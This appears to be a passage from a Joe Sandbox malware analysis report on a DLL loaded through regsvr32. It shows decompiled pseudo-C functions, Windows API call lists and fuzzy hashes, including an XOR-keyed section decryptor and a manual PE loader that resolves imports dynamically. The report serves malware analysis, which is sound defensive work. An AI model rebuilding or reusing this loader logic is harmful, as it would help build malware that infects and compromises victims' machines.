                                    								if(_t65 != 0 &&  *_t65 == 0) {
                                    									_t50 = _a4;
                                    									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                    								}
                                    							}
                                    						}
                                    						_t45 = _a4;
                                    						if(_t45 != 0) {
                                    							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                    						}
                                    						_t57 = __imp__#6;
                                    						if(_a20 != 0) {
                                    							 *_t57(_a20);
                                    						}
                                    						if(_a12 != 0) {
                                    							 *_t57(_a12);
                                    						}
                                    					}
                                    				}
                                    				_t41 = _v8;
                                    				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                    				goto L18;
                                    			}





















                                    APIs
                                      • Part of subcall function 001A56E3: SysAllocString.OLEAUT32(80000002), ref: 001A573A
                                      • Part of subcall function 001A56E3: SysFreeString.OLEAUT32(00000000), ref: 001A579F
                                    • SysFreeString.OLEAUT32(?), ref: 001A1996
                                    • SysFreeString.OLEAUT32(001A5BA8), ref: 001A19A0
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: String$Free$Alloc
                                    • String ID:
                                    • API String ID: 986138563-0
                                    • Opcode ID: 2806767892cfdc245d1f0474c19cffb4f1a76ae73fc8284f1a77c5e65539324b
                                    • Instruction ID: 55ffaeb34ef67fb163a58e8b504af68c4fc97ef772fb23437b76545aeb39c0e4
                                    • Opcode Fuzzy Hash: 2806767892cfdc245d1f0474c19cffb4f1a76ae73fc8284f1a77c5e65539324b
                                    • Instruction Fuzzy Hash: B4313B76900119BFCB11DF65C898C9BBB79FFCA744B144658F8069B210D331AD92CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 001A29B1
                                      • Part of subcall function 001A18B7: SysFreeString.OLEAUT32(?), ref: 001A1996
                                    • SafeArrayDestroy.OLEAUT32(?), ref: 001A29FE
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ArraySafe$CreateDestroyFreeString
                                    • String ID:
                                    • API String ID: 3098518882-0
                                    • Opcode ID: 7b3834c0fe1c6a284b3dd562eb025a41fa3f8e56479373da9d8810c4799adf03
                                    • Instruction ID: 5160b4f8f8d4f291f45a8272fb7651e16e9d0ee664bc00574d4bd42208318523
                                    • Opcode Fuzzy Hash: 7b3834c0fe1c6a284b3dd562eb025a41fa3f8e56479373da9d8810c4799adf03
                                    • Instruction Fuzzy Hash: 1A118E36A0010ABFDB01DFA8CC44AEEBBB8EF05350F008021FA04E7161E3789A55DB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E001A3D26(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                    				struct _FILETIME _v12;
                                    				signed int _t11;
                                    				void* _t19;
                                    				void* _t20;
                                    				void* _t22;
                                    				void* _t23;
                                    				signed short* _t24;
                                    
                                    				_t22 = __edx;
                                    				_t23 = E001A5691(_t11, _a12);
                                    				if(_t23 == 0) {
                                    					_t20 = 8;
                                    				} else {
                                    					_t24 = _t23 + _a16 * 2;
                                    					 *_t24 =  *_t24 & 0x00000000;
                                    					_t20 = E001A6CF1(__ecx, _a4, _a8, _t23);
                                    					if(_t20 == 0) {
                                    						GetSystemTimeAsFileTime( &_v12);
                                    						 *_t24 = 0x5f;
                                    						_t19 = E001A2A18(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8); // executed
                                    						_t20 = _t19;
                                    					}
                                    					HeapFree( *0x1aa290, 0, _t23);
                                    				}
                                    				return _t20;
                                    			}











                                    APIs
                                      • Part of subcall function 001A5691: lstrlen.KERNEL32(?,00000000,032F9F00,754B94D8,001A291A,032FA0FD,001A5FB9,001A5FB9,?,001A5FB9,?,69B25F44,E8FA7DD7,00000000), ref: 001A5698
                                      • Part of subcall function 001A5691: mbstowcs.NTDLL ref: 001A56C1
                                      • Part of subcall function 001A5691: memset.NTDLL ref: 001A56D3
                                    • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74EC1499,00000008,00000014,004F0053,032F9534), ref: 001A3D5D
                                    • HeapFree.KERNEL32(00000000,00000000,004F0053), ref: 001A3D8A
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                    • String ID:
                                    • API String ID: 1500278894-0
                                    • Opcode ID: e4ab326d91151b637faf8e13d352ed55cd54dc9abd37a795dde049ce54743e4d
                                    • Instruction ID: 75ff817002411b49f78d22e24858f60e314242f001f73bfb8e607e325b2ee094
                                    • Opcode Fuzzy Hash: e4ab326d91151b637faf8e13d352ed55cd54dc9abd37a795dde049ce54743e4d
                                    • Instruction Fuzzy Hash: 6E01F236100209BBDB215F98DC44FCA7B7DFF82350F500024FE449A060EB71D964C750
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • dllmain_crt_process_attach.LIBCMT ref: 6E2C33E5
                                    • dllmain_crt_process_detach.LIBCMT ref: 6E2C33F8
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                    • String ID:
                                    • API String ID: 3750050125-0
                                    • Opcode ID: 80260636c51fcd502011e63202024609385447e13dc8c82ea2f2cfaa7c8672f8
                                    • Instruction ID: 9098a98c0bf9c2a80afd01addecb391cef07d04d83716a9b90e828ba94013c1d
                                    • Opcode Fuzzy Hash: 80260636c51fcd502011e63202024609385447e13dc8c82ea2f2cfaa7c8672f8
                                    • Instruction Fuzzy Hash: C8E030321A424FDBC7C21DFAD51DBA9368BB706E16F404FD1B410C64A0CF66C252D5A3
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                    				intOrPtr _t4;
                                    				void* _t10;
                                    				signed int _t11;
                                    				void* _t13;
                                    
                                    				_t13 = 1;
                                    				_t4 = _a8;
                                    				if(_t4 == 0) {
                                    					if(InterlockedDecrement(0x1aa294) == 0) {
                                    						E001A38BC();
                                    					}
                                    				} else {
                                    					if(_t4 == 1 && InterlockedIncrement(0x1aa294) == 1) {
                                    						_t10 = E001A6632(_t11, _a4); // executed
                                    						if(_t10 != 0) {
                                    							_t13 = 0;
                                    						}
                                    					}
                                    				}
                                    				return _t13;
                                    			}








                                    APIs
                                    • InterlockedIncrement.KERNEL32(001AA294), ref: 001A6970
                                      • Part of subcall function 001A6632: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001), ref: 001A6647
                                    • InterlockedDecrement.KERNEL32(001AA294), ref: 001A6990
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Interlocked$CreateDecrementHeapIncrement
                                    • String ID:
                                    • API String ID: 3834848776-0
                                    • Opcode ID: eee3ee55df198c365a23c9c263320a8161014d18abe55e915bf22507f85c71ff
                                    • Instruction ID: 335c97b7d50ed95d80a3cf9283aec3a04ec24bdcae012b54edf4756480fddd8f
                                    • Opcode Fuzzy Hash: eee3ee55df198c365a23c9c263320a8161014d18abe55e915bf22507f85c71ff
                                    • Instruction Fuzzy Hash: 29E01A2E2442239A86221B748D1475FF7549B13F88B095514B459D1074C724DC908692
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 6E2C4F91: try_get_function.LIBVCRUNTIME ref: 6E2C4FA6
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E2C4DA6
                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 6E2C4DB1
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                    • String ID:
                                    • API String ID: 806969131-0
                                    • Opcode ID: 37ec313d12d833697cc84517c0fe3ef81ff4a7ef36d24a362fbf5e08cd8e7b17
                                    • Instruction ID: 81418ee342590cb3c3dfc499127188fe77d539e46b7592595944f3818c7434b0
                                    • Opcode Fuzzy Hash: 37ec313d12d833697cc84517c0fe3ef81ff4a7ef36d24a362fbf5e08cd8e7b17
                                    • Instruction Fuzzy Hash: 51D0A7284A820E5F99C439F8ED044CB27ABDC52F7E3700F47E020C95C4DB1480439017
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 84%
                                    			E6E2A1741(void* __ecx) {
                                    				void* _v8;
                                    				char _v12;
                                    				signed short _t15;
                                    				char* _t18;
                                    				char* _t25;
                                    				char* _t29;
                                    
                                    				_t22 = __ecx;
                                    				_push(__ecx);
                                    				_push(__ecx);
                                    				_t25 = 0;
                                    				if(E6E2A1344( &_v8,  &_v12,  *0x6e2a41cc ^ 0x13b675ce) != 0) {
                                    					if(_v8 == 0) {
                                    						_t29 = 0;
                                    					} else {
                                    						_t29 = E6E2A20BB(_t22, _v8,  *0x6e2a41cc ^ 0x64927f78);
                                    					}
                                    					if(_t29 != 0) {
                                    						_t15 = E6E2A105E(_t22); // executed
                                    						_v12 = _t15 & 0x0000ffff;
                                    						_t18 = StrStrIA(_t29,  &_v12); // executed
                                    						if(_t18 != 0) {
                                    							_t25 = 0x657;
                                    						}
                                    					}
                                    					HeapFree( *0x6e2a4190, 0, _v8);
                                    				}
                                    				return _t25;
                                    			}










                                    APIs
                                    • StrStrIA.SHLWAPI(00000000,6E2A1A94), ref: 6E2A1798
                                    • HeapFree.KERNEL32(00000000,?,?), ref: 6E2A17B2
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: 0c60af501eef954245d08c53f804b2c438d1fbba5cd0ab0da1ddc3b7fa019f15
                                    • Instruction ID: 09331d1b9b2ef66dbabfb3123ab69f08a45ee2d0c052733f17eb072376036e3b
                                    • Opcode Fuzzy Hash: 0c60af501eef954245d08c53f804b2c438d1fbba5cd0ab0da1ddc3b7fa019f15
                                    • Instruction Fuzzy Hash: A30171B6900519BBCB008BE98C44DEF77AFAB45711B100161AA01E3140EB71DA45D6B0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 6E2C6EF8
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: __crt_fast_encode_pointer
                                    • String ID:
                                    • API String ID: 3768137683-0
                                    • Opcode ID: c81ab07769dfaccaa79adecfcde9f785b0dea6da290d8cebedfb8951aba84883
                                    • Instruction ID: 41dcabd4c07c14438a675cc5f4a68d9451bf6433ce4c2c0256000cbc30d4ad57
                                    • Opcode Fuzzy Hash: c81ab07769dfaccaa79adecfcde9f785b0dea6da290d8cebedfb8951aba84883
                                    • Instruction Fuzzy Hash: 2411EB33A3492B9F9F519E99D8D4DAA3397EB85F207120311ED169B244D730DC01C7D2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 6E2C75C0: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6E2C7601
                                    • _free.LIBCMT ref: 6E2C9E20
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: 8a39ad25f5b89e4f6b0a0dfb4dc2656ec55be820a32b6dc560a249893fd0a959
                                    • Instruction ID: cd851fc17cf9c7274774046bbef52915e6f2f7004d8f4f8a0a5e63904b8b2df5
                                    • Opcode Fuzzy Hash: 8a39ad25f5b89e4f6b0a0dfb4dc2656ec55be820a32b6dc560a249893fd0a959
                                    • Instruction Fuzzy Hash: 830126762043496BE3618EA9CC45D8AFBEEEB85774F210A1DE594932C0EB30A815CB75
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 34%
                                    			E001A5D1D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                    				intOrPtr _v12;
                                    				void* _v18;
                                    				short _v20;
                                    				intOrPtr _t15;
                                    				short _t17;
                                    				intOrPtr _t19;
                                    				short _t23;
                                    
                                    				_t23 = 0;
                                    				_v20 = 0;
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosw");
                                    				_t15 =  *0x1aa2d4; // 0x314d7d0
                                    				_t4 = _t15 + 0x1ab394; // 0x32f8b64
                                    				_t20 = _t4;
                                    				_t6 = _t15 + 0x1ab124; // 0x650047
                                    				_t17 = E001A18B7(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                    				if(_t17 < 0) {
                                    					_t23 = _t17;
                                    				} else {
                                    					if(_v20 != 8) {
                                    						_t23 = 1;
                                    					} else {
                                    						_t19 = E001A1440(_t20, _v12);
                                    						if(_t19 == 0) {
                                    							_t23 = 8;
                                    						} else {
                                    							 *_a16 = _t19;
                                    						}
                                    						__imp__#6(_v12);
                                    					}
                                    				}
                                    				return _t23;
                                    			}











                                    APIs
                                      • Part of subcall function 001A18B7: SysFreeString.OLEAUT32(?), ref: 001A1996
                                      • Part of subcall function 001A1440: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,001A3B57,004F0053,00000000,?), ref: 001A1449
                                      • Part of subcall function 001A1440: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,001A3B57,004F0053,00000000,?), ref: 001A1473
                                      • Part of subcall function 001A1440: memset.NTDLL ref: 001A1487
                                    • SysFreeString.OLEAUT32(00000000), ref: 001A5D83
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: FreeString$lstrlenmemcpymemset
                                    • String ID:
                                    • API String ID: 397948122-0
                                    • Opcode ID: ea55518669df32f3dfe9aa8522e718e3bdc54809c1a2cbde10a9e5d21a731b60
                                    • Instruction ID: 2d6110037ceb1532e0154b8f82d6f8fb24992bcc0f6659a535d78e660b9f5fe8
                                    • Opcode Fuzzy Hash: ea55518669df32f3dfe9aa8522e718e3bdc54809c1a2cbde10a9e5d21a731b60
                                    • Instruction Fuzzy Hash: 6B01BC36508429BFDF11AFE8CC08DAEBBBAFB0A740F014825F905E2021E37099548791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 6E2C71D1
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: String
                                    • String ID:
                                    • API String ID: 2568140703-0
                                    • Opcode ID: 8ab639d51ce2d1100d5a195f04b74e01387e84f7540a980df52e9a916a23dd6a
                                    • Instruction ID: e8933d708029fa2dd3e050e604aedf4dfbad7fbf47a736f533af7aa5cb4119a4
                                    • Opcode Fuzzy Hash: 8ab639d51ce2d1100d5a195f04b74e01387e84f7540a980df52e9a916a23dd6a
                                    • Instruction Fuzzy Hash: 0401133654050DBBDF425FA4CC09DEE3FA7EF08B20F044615FE186A160CA728931EB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6E2C7601
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 2d25dcd52a2c5d93f0372e08f56ff91f3863969c6bced34ab57dd85dd508f713
                                    • Instruction ID: 8838076acf4f95c606049799eef3ba49b650501bb2e45f3d48f5a537edc73f89
                                    • Opcode Fuzzy Hash: 2d25dcd52a2c5d93f0372e08f56ff91f3863969c6bced34ab57dd85dd508f713
                                    • Instruction Fuzzy Hash: 89F0B43155462F5BEBD21EFBD815E5A375BAF82FB1B104721AC249A1C0CB70E80086E7
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Alloc
                                    • String ID:
                                    • API String ID: 2773662609-0
                                    • Opcode ID: b2c5025f444176b35522da56c5e26409924f1c456baee718426c38bab22b5027
                                    • Instruction ID: 7152bc17f5efc2c7ef1a1fc5de565d851a11c8407d1ec7cda0f69bab045ac212
                                    • Opcode Fuzzy Hash: b2c5025f444176b35522da56c5e26409924f1c456baee718426c38bab22b5027
                                    • Instruction Fuzzy Hash: 11E0A03555151CAB9A809BD6CC49EBEBB9BEB19F10B100659E81A5A200CE619A01C6E7
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • try_get_function.LIBVCRUNTIME ref: 6E2C4FA6
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: try_get_function
                                    • String ID:
                                    • API String ID: 2742660187-0
                                    • Opcode ID: 98c4b6270b823429caff4791982e5e85995db1d31119fff4bdc5bfa47970f8b3
                                    • Instruction ID: 93d8b2d7dcd603bc57270eac4e2ea153fccccf1af77f8db8875e891ba405ee3c
                                    • Opcode Fuzzy Hash: 98c4b6270b823429caff4791982e5e85995db1d31119fff4bdc5bfa47970f8b3
                                    • Instruction Fuzzy Hash: A8D0C23158192C63C5D021C1DC0AFBDBA06AB00EA3F040A62FB0A692408511C90082D3
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E6E2A1344(signed int** _a4, signed int* _a8, void* _a12) {
                                    				signed int _v8;
                                    				signed short _v12;
                                    				signed int _v16;
                                    				signed int _t53;
                                    				void* _t54;
                                    				void* _t62;
                                    				void* _t70;
                                    				signed int* _t73;
                                    				signed int _t76;
                                    				unsigned int _t78;
                                    				int _t80;
                                    				void _t86;
                                    				intOrPtr _t87;
                                    				signed short* _t90;
                                    
                                    				_v8 = _v8 & 0x00000000;
                                    				_t87 =  *0x6e2a41b0;
                                    				_t52 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                    				_t76 = ( *0x6e2a41cc ^ 0x0000150e) & 0x0000ffff;
                                    				_v16 = _t76;
                                    				_t90 = ( *( *((intOrPtr*)(_t87 + 0x3c)) + _t87 + 0x14) & 0x0000ffff) + ( *(_t52 + 6) & 0x0000ffff) * 0x28 + _t52 + 0x40;
                                    				while(1) {
                                    					_t53 =  *_t90 & 0x0000ffff;
                                    					if(_t53 == 0) {
                                    						break;
                                    					}
                                    					if(_t53 == _t76) {
                                    						L5:
                                    						_t54 = _a12;
                                    						if(_t54 == 0 || _t90[4] == _t54) {
                                    							if((_t90[1] & 0x00000002) != 0) {
                                    								goto L17;
                                    							} else {
                                    								_t73 = E6E2A2102(_t90[8] + 1);
                                    								if(_t73 == 0) {
                                    									L16:
                                    									_t76 = _v16;
                                    									goto L17;
                                    								} else {
                                    									if((_t90[1] & 0x00000001) == 0) {
                                    										_v8 = _t90[2];
                                    										_t62 = _t90[6] + _t87;
                                    										_t78 = _t90[8] >> 2;
                                    										_a12 = _t73;
                                    										while(_t78 != 0) {
                                    											_t86 =  *_t62 - _v8;
                                    											_v8 = _v8 + _t86;
                                    											_a12 = _a12 + 4;
                                    											_t62 = _t62 + 4;
                                    											_t78 = _t78 - 1;
                                    											 *_a12 = _t86;
                                    										}
                                    										_t80 = _t90[8] & 0x00000003;
                                    										if(_t80 != 0) {
                                    											memcpy(_a12, _t62, _t80);
                                    										}
                                    										_v8 = 1;
                                    										goto L25;
                                    									} else {
                                    										_v12 = _t90[8];
                                    										_t70 = E6E2A126E(_t90[6] + _t87, _t73); // executed
                                    										if(_t70 == _v12) {
                                    											_v8 = 1;
                                    										}
                                    										if(_v12 >= 4) {
                                    											 *_t73 =  *_t73 ^ _t90[2];
                                    										}
                                    										if(_v8 != 0) {
                                    											L25:
                                    											 *((char*)(_t73 + _t90[8])) = 0;
                                    											 *_a4 = _t73;
                                    											 *_a8 = _t90[8];
                                    										} else {
                                    											E6E2A2117(_t73);
                                    											goto L16;
                                    										}
                                    									}
                                    								}
                                    							}
                                    						} else {
                                    							L17:
                                    							_t90 = _t90 + 0x14 + (_t90[1] & 0x000000ff) * 4;
                                    							L18:
                                    							if( *_t90 == _t76) {
                                    								goto L5;
                                    							} else {
                                    							}
                                    						}
                                    					} else {
                                    						_t90 =  &(_t90[0xa]);
                                    						continue;
                                    					}
                                    					return _v8;
                                    				}
                                    				goto L18;
                                    			}


















                                    APIs
                                    • memcpy.NTDLL(?,?,?,?,00000000,00000001,?,?,?,6E2A1A94), ref: 6E2A143B
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: memcpy
                                    • String ID:
                                    • API String ID: 3510742995-0
                                    • Opcode ID: a85cce4c3a9994f2e21673c5ed92fd7a64c45c5b9639a85579472cb190720769
                                    • Instruction ID: 395570d99e85d8a9027eba5e444b07eb0c63a7bdd314389e7773def05d1617fe
                                    • Opcode Fuzzy Hash: a85cce4c3a9994f2e21673c5ed92fd7a64c45c5b9639a85579472cb190720769
                                    • Instruction Fuzzy Hash: A04192B590035ADFDB11CF9CC890AAAB7F6FF40325F14885DDA9297A44D734E989CB10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 86%
                                    			E6E2A1B55(void* __eax) {
                                    				char _v8;
                                    				void* _v12;
                                    				void* __edi;
                                    				void* _t18;
                                    				long _t24;
                                    				long _t26;
                                    				long _t29;
                                    				intOrPtr _t40;
                                    				void* _t41;
                                    				intOrPtr* _t42;
                                    				void* _t44;
                                    
                                    				_t41 = __eax;
                                    				_t16 =  *0x6e2a41cc;
                                    				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e2a41cc - 0x69b24f45 &  !( *0x6e2a41cc - 0x69b24f45);
                                    				_t18 = E6E2A165D( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e2a41cc - 0x69b24f45 &  !( *0x6e2a41cc - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e2a41cc - 0x69b24f45 &  !( *0x6e2a41cc - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
                                    				if(_t18 != 0) {
                                    					_t29 = 8;
                                    					goto L8;
                                    				} else {
                                    					_t40 = _v8;
                                    					_t29 = E6E2A119E(_t33, _t40, _t41);
                                    					if(_t29 == 0) {
                                    						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                                    						_t24 = E6E2A1552(_t40, _t44); // executed
                                    						_t29 = _t24;
                                    						if(_t29 == 0) {
                                    							_t26 = E6E2A1D96(_t44, _t40); // executed
                                    							_t29 = _t26;
                                    							if(_t29 == 0) {
                                    								_push(_t26);
                                    								_push(1);
                                    								_push(_t40);
                                    								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                    									_t29 = GetLastError();
                                    								}
                                    							}
                                    						}
                                    					}
                                    					_t42 = _v12;
                                    					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                    					E6E2A2117(_t42);
                                    					L8:
                                    					return _t29;
                                    				}
                                    			}















                                    APIs
                                      • Part of subcall function 6E2A165D: GetModuleHandleA.KERNEL32(?,00000020), ref: 6E2A1681
                                      • Part of subcall function 6E2A165D: GetProcAddress.KERNEL32(00000000,?), ref: 6E2A16A3
                                      • Part of subcall function 6E2A165D: GetProcAddress.KERNEL32(00000000,?), ref: 6E2A16B9
                                      • Part of subcall function 6E2A165D: GetProcAddress.KERNEL32(00000000,?), ref: 6E2A16CF
                                      • Part of subcall function 6E2A165D: GetProcAddress.KERNEL32(00000000,?), ref: 6E2A16E5
                                      • Part of subcall function 6E2A165D: GetProcAddress.KERNEL32(00000000,?), ref: 6E2A16FB
                                      • Part of subcall function 6E2A119E: memcpy.NTDLL(?,?,?), ref: 6E2A11CB
                                      • Part of subcall function 6E2A119E: memcpy.NTDLL(?,?,?), ref: 6E2A11FE
                                      • Part of subcall function 6E2A1552: LoadLibraryA.KERNEL32 ref: 6E2A158A
